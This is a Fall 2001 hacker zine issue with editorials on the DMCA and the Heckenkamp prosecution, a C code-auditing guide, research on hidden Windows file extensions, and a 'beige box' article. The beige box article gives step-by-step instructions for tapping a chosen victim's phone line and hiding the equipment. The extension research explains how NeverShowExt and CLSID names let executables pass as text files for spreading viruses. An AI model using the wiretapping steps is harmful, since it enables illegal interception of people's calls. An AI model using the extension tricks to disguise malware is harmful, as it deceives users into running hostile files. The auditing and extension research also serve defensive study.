H A C K E R ' S   D I G E S T
----------------------------------------------------------------------
www.hackersdigest.com            FALL 2001                     ISSUE 2
                       Pure Uncut Information

====================================================================*
|Power to the People
 ====================
|Hacker's Digest Focus Jerome Heckenkamp
 ========================================
|Guidelines for C Source Code Auditing
 ======================================
|The Cordless Beige Box Theory
 ==============================
|Invisible File Extensions on Windows
 =====================================
|Strategies for Defeating Distributed Attacks
 =============================================
|Autopsy of a Successful Intrusion
 ==================================
|Remote GET Buffer Overflow Vulnerability in CamShot WebCam HTTP
 ================================================================
|An Approach to Systematic Network Auditing
 ===========================================
|Ten Things NOT to do if Arrested
 =================================
|Statically Detecting Likely Buffer Overflow Vulnerabilities
====================================================================*

+==============================================================================+
|                            Get The Latest Issues                             |
|                            Join the Mailing List                             |
|                            ---------------------                             |
|  E-mail hd-request@hackersdigest.com with the word subscribe in the          |
|  subject line.                                                               |
+==============================================================================+

=======================[ Power to the People ]==========================

Digital Millennium Copyright Act, a law that turned me, colleagues,
professors, and many others into criminals overnight. Edward Felten, an
encryption researcher, was threatened by the RIAA over a lecture he
planned to give on cracking digital watermarks.
So, when I read how Disney, one of the many corporations suing 2600
for violations of the DMCA, has produced a show to teach children the
evils of swapping music on the internet, I was rather appalled. "The
Proud Family", a cartoon series aired on the Disney Channel, told the
story of a little girl who had spent all of her money on CDs and was
told of a web site called "EZ Jackerster" that provided a Napster-like
community for swapping copyrighted music. Knowing that what she was
doing was illegal because of the DMCA, the little girl did not want to
tell her friend, but did anyway. The whole thing spirals, and soon no
one is paying for music. The next thing you know, the little girl's
house is on the news for being responsible for the downfall of the
music industry.

If only the little girl knew how Disney played a part in having an
extremely bright teenager and his father arrested in Norway after he
wrote a program that would play DVDs on his computer. Or how it is not
the rap star "Sir Paid-A-Lot" who would go unpaid, but the record
label. Perhaps the little girl would have used her money to help
support the EFF (www.eff.org) in fighting arrogant corporations such as
Disney.

With that said, despite all of the criticism coming from all sorts of
people, it just does not look like the DMCA is going anywhere soon.
That's why what Emmanuel Goldstein of 2600 is doing, with the help of
the EFF, is so important to what we do. I wish them the best of luck.

The next thing to be afraid of is the Security Systems Standards and
Certification Act (SSSCA). The SSSCA is the brainchild of Senator
Hollings, and it will put even more Americans in jail for making
corporations such as Disney mad. It would be a civil offense to sell or
create any kind of computer equipment that "does not include and
utilize certified security technologies" approved by the federal
government.
It will create new federal felonies, punishable by five years in prison
and fines of up to $500,000, for anyone who distributes copyrighted
material with "security measures" disabled or has a network-attached
computer that disables copy protection. "Forgetting all the reasons why
this is bad copyright policy and bad information policy, it's terrible
science policy," says Jessica Litman, a law professor at Wayne State
University who specializes in intellectual property.

Although this is extremely important, and something we will need to
come together to fight, it has been overshadowed by the events that
occurred on September 11th. New and far more dangerous bills were
proposed, one of them being the 'Anti-Terrorism' Act, which I honestly
believe was a bill that took advantage of a nation in mourning. Here is
a letter I wrote to Vulnerability Development, a security newsgroup.

In case you have been living under a rock the past few weeks, you
should know that our civil liberties are under attack. Kevin Poulsen
wrote: "Hackers, virus-writers and web site defacers would face life
imprisonment without the possibility of parole under legislation
proposed by the Bush Administration that would classify most computer
crimes as acts of terrorism."
(http://www.securityfocus.com/news/257, Hackers face life imprisonment
under 'Anti-Terrorism' Act). When you read the news this morning you
will see that this bill was passed by the Senate.
(http://www.securityfocus.com/news/265, Senate passes terror bill).

I will say that most of the readers of this newsgroup are not hackers
but Network Administrators who are very involved with the security
community. That is why I am asking you not to report minor scans
against your network to the abuse department of any ISP if this bill
becomes law. As a Network Administrator for many years now, I have made
it a routine to check my logs every morning for scans against my
network and to send the logs of attacks to the abuse department of the
ISP.
To this day I encourage every Network Administrator I talk to to follow
this practice. It is my job as a Network Administrator to report these
attacks on my network; it is what I am paid to do. However, if/when
this bill becomes law I will no longer report these attacks, and I urge
every Network Administrator to join me in this Civil Disobedience
Protest against this bill.

If/when this bill becomes law, Hackers/Script Kiddies will no longer be
looked at as just kids messing around with computers, but as
terrorists. The press had just started to tell the difference between a
criminal who uses computers and a Hacker. Now they are all just going
to be terrorists. I have a problem with this.

Perhaps you think this could not happen to you. Well, I would suggest
you read the story of Jerome Heckenkamp (http://www.freesk8.org/), a
contributor to BugTraq who wrote an exploit for qpop and who is now
facing 16 counts of computer crimes, a maximum sentence of 85 years,
and up to $4 million in fines, after Qualcomm reported him to the FBI.
This case is harsh now; just imagine if it had happened under the
'Anti-Terrorism' bill. This could happen to you.

Again, I have always felt it was my duty to report attacks against my
network to the attacker's ISP. I looked at it as doing my part to make
the internet more secure. I figured it was a good lesson for the kid to
have his service taken away. If this bill becomes law, then it's no
longer just some kid getting his service taken away. It is something
that can escalate to much more and could result in some kid going to
jail for a long time. I will not be a part of it, even if there is just
a slight possibility that this can happen. I want nothing to do with
it.

I ask each and every one of you to join me in this protest. It is not
too late to make a difference. Once you lose your rights you will never
get them back.

After I wrote this letter I received email for days, with a lot of
support as well as a lot of criticism.
Most people argued that you do not have a right to write viruses;
however, you do. There is nothing illegal about writing computer
viruses, but it is illegal to write them and then release them in the
wild. The other point made to me was that if everyone stopped reporting
these attacks, it would seem as if the law was working, and that would
fuel other laws of the sort. This is a great point.

The bill was passed, but the part that could put hackers in jail for
life was removed, thanks to people like Kevin Poulsen who made the
public aware of what could happen. It also shows the power we have to
make a difference by contacting our state representatives.

===============[ Hacker's Digest Focus Jerome Heckenkamp ]==============

Jerome Heckenkamp, also known as 'sk8', is an extremely intelligent
individual who is facing a maximum sentence of 85 years and close to $4
million in fines, and who claims he is a scapegoat for the FBI. Jerome
is being charged with 16 counts of computer crimes, with the alleged
victims being eBay, E-Trade, Lycos, Exodus, and Qualcomm.

Jerome Heckenkamp, who graduated from college at the age of 18 and
worked at Los Alamos National Labs as a security researcher, has
pleaded innocent to all 16 counts stacked against him and has refused
all plea bargains offered to him. The FBI claims that he is the hacker
known as MagicFX, who has been defacing web sites for years.

The story goes like this. Jerome Heckenkamp was a student at the
University of Wisconsin. He had a computer with a default installation
of Linux that he would perform security audits on in his spare time. In
1999 Jerome disclosed two security exploits he wrote to BugTraq,
following the unwritten code to a T.
He alerted the vendor to the security hole and gave them more than
enough time to write a patch. On top of that, when he released the
exploit to BugTraq he changed a line of code so that it was useless
unless you were smart enough to look at the code and figure out how to
make it work. Perhaps he would not even be in this mess if he had not
told Qualcomm (the company that owns the POP3 mail daemon qpopper,
a.k.a. qpop). After all, they were the ones who went to the FBI after
machines were getting owned with a 0-day exploit for qpop. In his post
to BugTraq he did say "I found this overflow myself earlier this month.
Seems someone else recently found it before Qualcomm was able to issue
a patch." But let's not be naive, he is a smart kid.

The FBI claims he is a hacker known as 'MagicFX'. Just do a search on
Google for MagicFX and you will see all of his work. MagicFX has been
all over the press for tons of hacks he has pulled. However, Jerome
Heckenkamp says he is not MagicFX and knows nothing about him.

An article written about MagicFX quotes him as follows: "I exploited a
buffer overflow condition, which existed in an SUID root program," says
the hacker, who is finishing up a B.S. in computer science. When this
interview took place Jerome Heckenkamp had already graduated from
college with a degree in computer science. This is just about the only
point the authors of Free Sk8 (www.freesk8.org) could make that
suggests Jerome Heckenkamp is not MagicFX.

However, in some of the interviews MagicFX raves about how he had
exploited systems using a buffer overflow in an SUID program. Jerome
Heckenkamp did write a buffer overflow exploit for just this type of
security hole, but let's understand that SUID programs are riddled with
security holes to begin with, so this does not really mean anything.

Another interesting fact is that I could not find any attacks by
MagicFX after Jerome Heckenkamp's arrest.
I also have to stress that this really does not mean anything either,
because if I did find someone who was hacked by MagicFX, I would argue
that anyone who owns a keyboard can be MagicFX. I mean, people are
still claiming to see Elvis.

So now that we have seen both sides of the story, why does the FBI
think Jerome Heckenkamp is MagicFX? Well, besides the fact that Jerome
Heckenkamp and MagicFX do have a few things in common, like the fact
that they both went to college, the FBI is claiming that some of the
attacks originated from Jerome Heckenkamp's personal computer.

Jerome Heckenkamp's personal computer plays a very interesting part in
all of this. Jerome Heckenkamp owned two computers. One he used
frequently; the other had a default installation of Linux, which he
would audit for security holes in his spare time. Now he claims that
someone (MagicFX) broke into his computer and launched attacks from it.
This would explain why he wrote in his BugTraq post "I found this
overflow myself earlier this month. Seems someone else recently found
it before Qualcomm was able to issue a patch."

One of the most interesting facts about Jerome's personal computer is
that it held an archive of exploits and a database of computers that
had been compromised. Now what are the chances of MagicFX breaking into
one of Jerome Heckenkamp's computers? Well, I would have to say the
odds are more in his favor after learning that the administrators of
the college network broke into his computer as well. It seems that the
network administrators were receiving complaints that the mail server
on the network was attacking computers. This shows just how insecure
the second computer was, and it completely destroys the integrity of
the only evidence they have against Jerome Heckenkamp.

Another thing to remember here is that the FBI had been harassing
Jerome Heckenkamp for almost a year before they searched and seized his
second computer.
This gave Jerome Heckenkamp a huge window in which to delete, or at the
very least encrypt, the data that is now being used against him. He is
a smart kid; if he was guilty, why would he make such a huge mistake?

I have been working with the authors of www.freesk8.org to write this
article, and there are a few pieces of the puzzle that I could not get
answers on. First, there is nothing on the Free Sk8 web site about one
of the charges against him, tampering with a witness. I would really
like to know what that is all about. Second, if you check out the Free
Sk8 web site there is a FAQ about Jerome Heckenkamp. One of the
questions is "Has Heckenkamp ever been convicted of a computer crime
before?" with the simple answer of just "No." This is true, Jerome has
not been arrested before, but this would be a good place to mention
that US attorneys have said Jerome admitted to computer crimes while at
the university and agreed to a one-year suspension from its graduate
school. They also said that he was fired from a student job after he
admitted illegally trespassing on an Internet service provider in 1997.
When I asked the authors of Free Sk8 about this, they had no comment.

What makes this case even stranger is the blatant harassment by the
FBI. The FBI has been harassing the authors as well as the hosting
provider, and successfully had the site removed from the internet two
different times.

The other thing about this whole mess is an article written by Adam
Penenberg of Forbes. It was an interview with MagicFX. A lot of what
was said contradicts the FBI's claims that Jerome Heckenkamp is
MagicFX. This article cannot be found in the Forbes archives anymore,
but all of the other articles written by Adam Penenberg can. Makes you
wonder a little bit, doesn't it?

There are a lot of blurry lines in this case and it's hard to say what
really happened. There are just a few facts to the case. Like the fact
that there is no evidence to really support the FBI's claims.
Just a computer that, according to the FBI, was a launching pad for
these attacks, and that has already been proven to be insecure when the
network administrator broke into it. There is the sad fact that you are
guilty until proven innocent. The only reason Jerome Heckenkamp is
walking the streets and not in a cell with criminals is that a friend
posted $50,000 bail.

Last, let's not forget the ignorance of the prosecutor, Ross Nadel, who
needs to read a book about networking, and not just a few pages so that
he seems to have somewhat of a clue. It was so funny, yet so sad, to
read how Ross Nadel tried to explain that an IP address is a separate
entity between the computer and the internet, and that because the
school owned the IP address, it could therefore enter the IP address.
All I can say about that is I am glad this guy is a prosecutor, because
the thought of him defending someone is just frightening.

I think that unless the FBI can find some real evidence, Jerome's life
will go back to normal. However, it's sad to know something like this
will follow him for the rest of his life.

===============[ Guidelines for C Source Code Auditing ]================
--- by Mixer ---

Introduction

I decided to write up this paper because of the many requests I've been
getting, and also because I found that no comprehensive resource on
source code vulnerability auditing was out there yet. Obviously, this
is a problem, as the release rate of serious exploits is still
increasing and, more problematic, more serious exploits than before are
released in private and circulate longer in the "underground" among
black-hats before becoming available to the full-disclosure community.
This situation makes it even more important for the "good guys" (whom I
associate more with the full disclosure movement) to be able to find
vulnerabilities and audit relevant code themselves, in the hope of
staying a few steps ahead of the private exploit scene.
Of course, code auditing is not the only security measure. Good
security design should start before the programming, enforcing
guidelines such as a software development security design methodology
from the very beginning. Generally, security relevant programs should
enforce minimum privilege at all times, restricting access wherever
possible. The trend toward running daemons and servers inside
chroot-cages where possible is also an important one. However, even
that isn't foolproof: in the past, this measure has been circumvented
or exploited within limits, with chroot-breaking and kernel
weakness-exploiting shellcode.

When following a thought-out set of guidelines, writing secure code, or
making existing code reasonably secure, doesn't necessarily require an
Orange Book certification or a tiger team of expert coders to sit on
the code. In evaluating the cost of code auditing, the biggest factors
are the project size (i.e., lines of code) and the current stage of
design or maturity of the project.

Relevant code and programs

Security is especially important in the following types of programs:

  * setuid/setgid programs
  * daemons and servers, not limited to those run by root
  * frequently run system programs, and those that may be called from
    scripts
  * calls of system libraries (e.g. libc)
  * calls of widespread protocol libraries (e.g. kerberos, ssl)
  * kernel sources
  * administrative tools
  * all CGI scripts, and plug-ins for any servers (e.g. php, apache
    modules)

Commonly vulnerable points

Here is a list of points that should be scrutinized when doing code
audits. You can read more on the process under the next points. Of
course, that doesn't mean the rest of the code is irrelevant: any code
may be somehow relevant to security, especially if you consider the
possibility that pieces of code may be reused in other projects, at
other places.
However, when searching for vulnerabilities, one should generally
concentrate on the following most critical points:

Common points of vulnerability:

  * Non-bounds-checking functions: strcpy, sprintf, vsprintf, sscanf
  * Using bounds checking in the format string, instead of the bounds
    checking functions (e.g. %10s, %6d), is deprecated.
  * Gathering of input in for/while loops, e.g.
    for(i=0;i 0) buf += bytesread;
  * Calls like execve(), execution pipes, system() and similar things,
    especially when called with non-static arguments
  * Any repetitive low-level byte operations with insufficient bounds
    checking
  * Some string operations can be problematic, such as breaking strings
    apart and indexing them, i.e. strtok and others
  * Logging and debug message interface functions without mandatory
    security checks in place
  * Bad or fake randomness (example: bind ID spoofing)
  * Insufficient checking for special characters in external data
  * Using read and other network calls without timeouts (can lead to a
    DoS)

External data entry points:

  * Command line arguments (i.e. getopt) and environment arguments
    (i.e. getenv)
  * System calls, especially those getting foreign input (read, recv,
    popen, ...)
  * Generally, file handling. Creating files, especially in public file
    system areas, leads to race conditions (not checking for links is
    also a big problem)

System I/O:

  * Library weaknesses. E.g. format bugs, glob bugs, and similar
    internal weaknesses. (Specific code scanning tools can often be
    used in these cases.)
  * Kernel weaknesses. E.g. fd_set glitches, socket options, and
    generally, user-dependent usage of system calls, especially network
    calls.
  * System facilities. Input from and output to facilities such as
    syslog, ident, nfs, etc.
    without proper checking

Rare points:

  * One-byte overwriting of bounds (improper use of strlen/sizeof, for
    example)
  * Using sizeof on non-local pointer variables
  * Comparing signed and unsigned variables (or casting between signed
    and unsigned) can lead to erroneous values (e.g., -1 becomes
    UINT_MAX)

Auditing: the "black box" approach

I shall mention black box auditing only briefly here, as it isn't the
main focus of this paper. Black box auditing, however, is the only
viable method for auditing non-open-source code (besides reverse
engineering, perhaps). To audit an application black box, you first
have to understand the exact protocol specifications (or command line
arguments or user input format, if it's not a network application). You
then try to circumvent these protocol specifications systematically,
providing bad commands, bad characters, and right commands with
slightly wrong arguments, testing different buffer sizes, and recording
any abnormal reactions to these tests. Further attempts include the
circumvention of regular expressions and supposed input filters, input
manipulation at points where no user input, but binary input from
another application, is expected, etc. Black box auditing tries to
actively crack exception handling where it is supposed to exist, from
the perspective of a potential external intruder. Some simple test
tools are available that may help to automate parts of this process,
such as "buffer syringe". The part of black box auditing that
determines the specified protocol and tests for any possible violations
is also a potentially useful new method that could be implemented in
Intrusion Detection Systems.

Auditing: the "white box" approach

White box testing is the "real stuff", the methodology you will
regularly want to use for finding vulnerabilities in a systematic way
by looking at the code.
And that's basically its definition: a systematic audit of the source
that (hopefully) makes sure that every single critical point in the
source is accounted for. There are two main approaches.

In the top-to-bottom approach, you find all places of external user
input, system input, and sources of data in general, write them down,
and start your audit from each of these points. You determine what
bounds checking is or is not in place, and based on that, you go down
all possible execution branches from there, including the code of all
functions called after the input points, the functions called by those
functions, and so on, until you've covered all parts of the code
relevant to external input.

In the bottom-to-top approach, you start in main() (or the equivalent
starting function if wrapped in libraries such as gtk or rpc), or
alternatively the server accept/input loop, and begin checking from
there. You go down all functions that are called, briefly checking
system calls, memory operations, etc. in each function, until you come
to functions that don't call any other sub functions. Of course, you'll
put the emphasis on all functions that directly or indirectly handle
user input.

It's also a good idea to compare the code with secure standards and
good programming practice. To a limited extent, lint and similar
programs, and strict compiler checks, can help you do so. Also take
notice when a program doesn't drop privileges where it could, if it
opens files in an insecure manner, and so on. Such small things might
give you further pointers as to where security problems may lie.
Ideally, a program should always have a minimum of internal self checks
(especially the checking of return values of functions), at least in
the security critical parts. If a program doesn't have any automated
checks, you can try adding some to the code, to see if the program
works as it's supposed to work, or as you think it's supposed to work.
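
To make a few of the checklist items from this paper concrete, here is
a minimal C sketch. It is not taken from the original paper. The helper
names copy_checked, read_bounded and length_ok are hypothetical, and a
POSIX system (read(), ssize_t) is assumed. It illustrates, under those
assumptions, a bounded replacement for a bare strcpy, an input loop
that tracks the space left instead of blindly doing buf += bytesread,
a sign check before a length is used as an unsigned size, and return
values that the caller is expected to check.

```c
#include <errno.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: copy src into dst, which holds dstsize bytes.
 * Refuses to truncate. Returns 0 on success, -1 if src does not fit. */
int copy_checked(char *dst, size_t dstsize, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dstsize == 0)
        return -1;
    len = strlen(src);
    /* ">=" rather than ">" leaves room for the terminating NUL and so
     * avoids the one-byte overwrite listed under "Rare points". */
    if (len >= dstsize) {
        dst[0] = '\0';          /* leave dst in a defined state */
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* Hypothetical helper: read from fd until EOF or until buf is full.
 * Always NUL-terminates. Returns the bytes stored, or -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t bufsize)
{
    size_t used = 0;

    if (buf == NULL || bufsize == 0)
        return -1;
    while (used < bufsize - 1) {
        /* Never ask for more than the space that is still free. */
        ssize_t n = read(fd, buf + used, bufsize - 1 - used);
        if (n < 0) {
            if (errno == EINTR)
                continue;       /* interrupted by a signal: retry */
            return -1;          /* real error: report it upward */
        }
        if (n == 0)
            break;              /* EOF */
        used += (size_t)n;
    }
    buf[used] = '\0';
    return (ssize_t)used;
}

/* Hypothetical helper: validate a length taken from untrusted input
 * before it is used as an unsigned size. A negative value converted
 * to an unsigned type would turn into a huge number. */
int length_ok(long claimed, size_t limit)
{
    if (claimed < 0)
        return 0;
    return (unsigned long)claimed <= limit;
}
```

During an audit, a call such as strcpy(dst, src), or a read loop that
advances the buffer pointer without tracking the space left, would be
the kind of spot to compare against these patterns. Note that this
sketch does not address timeouts on read(), which the checklist also
mentions.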
==================[ The Cordless Beige Box Theory ]=====================
--- by Lucid & Actinide ---

Disclaimer:

This article file is for informational purposes ONLY! The knowledge,
theories, & instructions held herein are not to be practiced. In fact,
don't read this. Why not just be safe, go lock yourself in your room,
kill yourself, do what you have to do, just don't read this.

Explanation

Ok, so if you don't know what a beige box is, here's a small
explanation of what it is and what it does.

What it is

Ever seen the linemen at your local B-Box? Ever see the handsets they
have? ( Usually red, blue, or black ). Well, a beige box is a makeshift
version of a lineman's test set.

What it does

A beige box gives one the ability to jack into a phone line and make
calls, listen in, and pretty much anything else you wanna do with
someone's phone line. ( The conf maker's best friend. )

What do I need?

  * Cheap cordless phone (rat shack)
  * 9 volt battery coupler ( one that can hold an 8 pack is the best )
  * Pack of 9 volt batteries ( 8+ )
  * 10+ foot RJ-11 phone line ( no bright colors! )
  * Large plastic bag ( ziplock owns me )
  * Zip ties ( wire ties )
  * Wire cutters
  * Basic knowledge of wire splicing
  * Phillips head screwdriver ( the star looking one )
  * *Optional* Alligator clips

How do I make it & Use it?

Simple really. Most cordless phones run off 9 volt AC jacks... thus..
this is what ya gotta do.

1: Remove the AC power adapter from the end of the phone's power cord.
2: Place your batteries inside the coupler.
3: Splice the battery coupler to the end of the cordless phone's power
   cord.
4: If needed, attach the alligator clips to the red and green wires on
   the RJ-11 phone line.
5: Bag the base ( the charger ) as well as the battery pack and make a
   small hole for the phone line to come out of.
6: Find yourself a victim in a not well lit area, preferably with
   bushes and trees.
7: Locate the telco box of your victim ( usually a white or green box
   on the side of the house or in the front yard )
8: Un-screw the damn thing and look at the goodies on the inside.
   * If it has an RJ-11 jack then alligator clips won't be needed.
   * If it contains a tangled mess of wires, get the alligator clips
     out.
9: Hook up to the person's phone line:
   * RJ-11 Jack: Umm, hook the phone line into the fucking jack, not
     exactly brain surgery.
   * Wires: Locate the red and green wires, hook red to red and green
     to green.
10: MAKE SURE you have a dial tone! It's a bitch when you don't.
11: Hide the base and battery pack in a nearby bush ( or trash can if
    they got one there )
12: Do what you want to do... don't get caught.

Schematics ( for the geeky )

[ASCII schematic not recoverable. It showed the cordless phone base
(#1) wired through its power cord (#2) to the battery coupler (#3), and
through the RJ-11 phone line (#4) to the telco box (#5).]

  #1 Cordless Phone Base
  #2 AC power cord
  #3 9volt Battery Coupler
  #4 RJ-11 Phone Line
  #5 Telco Box

===============[ Invisible File Extensions on Windows ]=================
--- by Floydman ---

Abstract

The goal of this paper is to present the research I did on invisible
file extensions on the Windows operating systems. After I published my
initial research material in various places on the internet, many
people pointed me to bits of information that were already known on
this topic, but that I didn't know about. However, my experiments
approached the problem from a different angle than other people's
previous work, and they somewhat complement it. In this paper, I will
put together all I have found on this topic so far. The ultimate goal
is to find a) invisible file extensions, and b) whether these invisible
file extensions are able to run code, and thus be used to propagate a
virus.
Preface

A little while ago, I was having a conversation with some of my
colleagues about computer viruses. The "Life Stages" virus was
mentioned during the conversation. This virus disguises itself in a
file with the extension .SHS, while pretending to be a .TXT file. This
was possible because the .SHS extension is hidden by Windows, even if
it is configured to display all files and all extensions (even for
known file types), and the file actually passes for an (almost) real
.TXT file. Following this conversation, I thought to myself "I wonder
if there are any other file extensions with this attribute that could
potentially be used in a virus design?". This is what I have found so
far.

Targeted audience

This document is presented to anyone who has an interest in computer
security, viruses, operating systems and computing in general.

Special Thanks to: Tony, Ken Brown, JFC, Henri, Seva Gluschenko, Adam
L. Simms and a couple of others for your input on this paper and for
pointing me in good directions. Thanks also to the original researchers
who found some of the things explained here.

Introduction

To do this research, someone suggested that I plunder the registry,
since all file extensions are (supposed) to be listed there.
But the registry gives little if any information about the purpose of a
given file extension in the system, or about the visual behavior it
presents to the user (which in turn can exploit the user's gullibility
to activate a virus). What interested me was how Windows presents the
file via the GUI, not just the list of extensions recognized by
Windows. Also, I didn't really trust the registry to hold each and
every file extension it uses in the same place (after all, we trusted
it to display all file information, didn't we?).

It was only afterwards that some people pointed me to research on this
topic that had been done about a year before. It turns out that the
invisibility is caused by a registry key named NeverShowExt. Knowing
this, finding invisible extensions becomes a breeze, but back then I
didn't know this, and looking in the registry when you don't know
exactly what you're looking for is like searching for a needle in a
haystack.

So I made a Perl script that would generate all possible combinations
of file extensions 1, 2 and 3 characters long. I did not test file
extensions of 4, 5 or more letters, because I did not have the time to
plunder through all the possible combinations. But as has been pointed
out to me, the Windows operating system supports file extensions longer
than 3 letters (.HTML is the prime example). Also, the registered file
types will vary from one computer to another, since this is tightly
related to the installed applications. Some applications will also
rename common known file types to their own applicat

The .SHS file type

The best known invisible file type is .SHS, since the "Life Stages"
virus used this "feature" to camouflage a virus in what looked like an
innocent .TXT ASCII file. But the most common invisible file type is
used by practically everybody, and that is .LNK, the shortcuts you use
on your desktop or menus to open up applications and files.
We tend to think of these shortcuts as objects of the operating system, but in fact they are only small files with a hidden .LNK extension appended to their names.

So, back to .SHS: it stands for Shell Scrap. It's an old dinosaur from Windows 3.1 that was mostly unknown until only a couple of years ago. It is used for OLE (Object Linking and Embedding); using a Shell Scrap, you can embed any file you want, even an executable, in a Word document, for example, and the system will open it for you. The .SHS file bears an icon somewhat resembling Notepad's, but slightly different (the bottom of the page is ripped). The .SHS extension itself is invisible, as we said, so you can make the file look like something else. For an excellent overview of Shell Scraps, see http://www.pc-help.org/security/scrap.htm.

The NeverShowExt registry key

At this point, I should clarify that when I say a file extension is invisible, I mean that it does not show in Windows Explorer, even if you have set every configuration option to display everything there is to display ("Show hidden files and folders", "Hide file extensions for known file types", "Hide protected operating system files"). However, if you list the contents of the directory in a DOS box, you will see the whole filename and its extension(s). The component in Windows that makes some files behave this way is a registry key named NeverShowExt.
Here is an example of how this is used in the registry:

    [HKEY_LOCAL_MACHINE\Software\CLASSES\ShellScrap]
    @="Scrap object"        REG_SZ
    "NeverShowExt"=""       REG_SZ

Here are the file extensions that were invisible (or displayed other non-standard behavior) by default on my system:

    .cnf  SpeedDial (Extension not visible)
    .lnk  Shortcut (Extension not visible)
    .mad  Microsoft Access Module Shortcut (Extension not visible)
    .maf  Microsoft Access Form Shortcut (Extension not visible)
    .mag  Microsoft Access Diagram Shortcut (Extension not visible)
    .mam  Microsoft Access Macro Shortcut (Extension not visible)
    .maq  Microsoft Access Query Shortcut (Extension not visible)
    .mar  Microsoft Access Report Shortcut (Extension not visible)
    .mas  Microsoft Access StoredProcedure shortcut (Extension not visible)
    .mat  Microsoft Access Table Shortcut (Extension not visible)
    .mav  Microsoft Access View Shortcut (Extension not visible)
    .maw  Microsoft Access Data Access Page Shortcut (Extension not visible)
    .pif  Shortcut to MS-DOS Program (Extension not visible)
    .scf  Windows Explorer Command (Extension not visible, generic icon)
    .shb  Shortcut into a document (Extension not visible)
    .shs  Scrap object (Extension not visible)
    .uls  Internet Location Service (generic icon)
    .url  Internet Shortcut (Extension not visible)
    .xnk  Exchange Shortcut (Extension not visible)

Here is a command line directory listing of some test files I made:

    dir test.*

    Directory of C:\TEMP

    2001-03-30  12:49       7 test.cnf
    2001-03-30  12:49       7 test.lnk
    2001-03-30  12:49       7 test.mad
    2001-03-30  12:49       7 test.maf
    2001-03-30  12:49       7 test.mag
    2001-03-30  12:49       7 test.mam
    2001-03-30  12:49       7 test.maq
    2001-03-30  12:49       7 test.mar
    2001-03-30  12:49       7 test.mas
    2001-03-30  12:49       7 test.mat
    2001-03-30  12:49       7 test.mav
    2001-03-30  12:49       7 test.maw
    2001-03-30  12:49       7 test.pif
    2001-03-30  12:49       7 test.scf
    2001-03-30  12:49       7 test.shb
    2001-03-30  12:49      14 test.shs
    2001-03-30  12:43       7 test.shs.txt
    2001-03-30  12:42       7 test.txt
    2001-03-30  12:42       7 test.txt.shs
    2001-03-30  12:42       7 test.uls
    2001-03-30  12:49       7 test.url
    2001-03-30  12:49       7 test.xnk

In Explorer-like tools, the same files appear as test, test, test, test, test, test, test, test, test, test, test, test, test, test, test, test, test.shs.txt, test.txt, test.txt, test.uls, test, test.

Of course, if I had taken some time to do some research on the Internet, I would have known this; a simple search for "NeverShowExt" in the registry, and voilà (BTW, this is how this word is really spelled), I would have had the list of extensions that were invisible on my computer. This "feature" can be added to any extension, and it can also be removed (by adding or deleting the NeverShowExt keys in the registry).

CLSID

Excerpt from http://msdn.microsoft.com/library/psdk/com/reg_6vjt.htm

"CLSID Key

A CLSID is a globally unique identifier that identifies a COM class object. If your server or container allows linking to its embedded objects, then you need to register a CLSID for each supported class of objects.

Registry Entry
    HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID =

Value Entries
    CLSID   Specifies a name that can be displayed in the user interface.

Remarks
The CLSID key contains information used by the default COM handler to return information about a class when it is in the running state. To obtain a CLSID for your application, you can use the UUIDGEN.EXE found in the \TOOLs directory of the COM Toolkit, or use CoCreateGuid. The CLSID is a 128 bit number, spelled in hex, within a pair of braces."

Shortly after I posted my initial research material, I was contacted by Adam L. Simms about an e-mail thread concerning hidden CLSID extensions. Since I was curious to know more about this topic, he forwarded me part of the thread containing information about it.

As we have seen at the beginning of this chapter, a CLSID is a unique numeric identifier used to register applications in an object linking and embedding scheme.
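To make the quoted definition concrete, here is a minimal Python sketch (an illustration, not part of the original research) that checks whether a string has the registry form of a CLSID, that is, a 128-bit number spelled in hex within a pair of braces. The helper name parse_clsid is hypothetical; the sketch relies only on Python's standard re and uuid modules.

```python
import re
import uuid

# Registry form of a CLSID: {8-4-4-4-12 hex digits}
CLSID_RE = re.compile(
    r"^\{[0-9A-Fa-f]{8}-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{4}"
    r"-[0-9A-Fa-f]{4}-[0-9A-Fa-f]{12}\}$"
)

def parse_clsid(text):
    """Return a uuid.UUID if text is a braced CLSID, else None."""
    if not CLSID_RE.match(text):
        return None
    return uuid.UUID(text)  # uuid.UUID accepts the braced form

# The HTML Application CLSID listed in this paper.
hta = parse_clsid("{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}")
print(hta is not None, len(hta.bytes) * 8)   # size in bits
print(parse_clsid("txt"))                    # an ordinary extension is rejected
```

A check like this is only about the textual shape of the identifier; whether a given CLSID is actually registered on a machine still has to be looked up in the registry.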
In Windows, applications and the various file extensions they use are closely related. This is why, for example, a .DOC file is associated with the Word application. Well, as it turns out, you can create a file and, instead of giving it a normal file extension, use the associated CLSID as the file's extension. What's more interesting is that the file will automatically assume the properties of the associated file extension, and the extension itself will be invisible.

Here are some examples of CLSIDs:

    html application (.HTA)   {3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}
    mhtml document            {3050F3D9-98B5-11CF-BB82-00AA00BDCE0B}
    xml                       {48123bc4-99d9-11d1-a6b3-00c04fd91555}
    xsl                       {48123bc4-99d9-11d1-a6b3-00c04fd91555}
    html                      {25336920-03F9-11cf-8FD0-00AA00686F13}

I ran some tests to verify the extent of this "feature", and the results surprised me very much. I created some files using the html application and html CLSIDs above. I also created similar files with their associated extensions, and some files using CLSIDs chosen at random from my registry. While looking in the registry for these extensions and CLSIDs under [HKEY_CLASSES_ROOT], I also found several descriptors that looked like Access.ShortCut.Macro, Amovie.ActiveMovie Control and CDDBControl.CddbURLManager. Now knowing about the CLSID problem, I found it wise to test a few of these also, just in case ;-)

In DOS, the files looked like this:

     Volume in drive D is CD
     Volume Serial Number is 443F-FFED
     Directory of D:\work\temp

    .                    05-08-01 12:35a .
    ..                   05-08-01 12:35a ..
    TEST     HTA       0 05-08-01 12:36a test.hta
    TESTTX~1 {25       0 05-08-01 12:37a test.txt.{25336920-03F9-11cf-8FD0-00AA00686F13}
    TESTTX~1 HTM       0 05-08-01 12:38a test.txt.html
    TEST     PIF       0 05-08-01 12:38a test.pif
    TEST~1   PIF       0 05-08-01 12:38a test.piffile
    TESTAC~1 APP       0 05-08-01 12:39a test.Access.Application
    TESTAC~1 1         0 05-08-01 12:40a test.Access.ShortCut.Macro.1
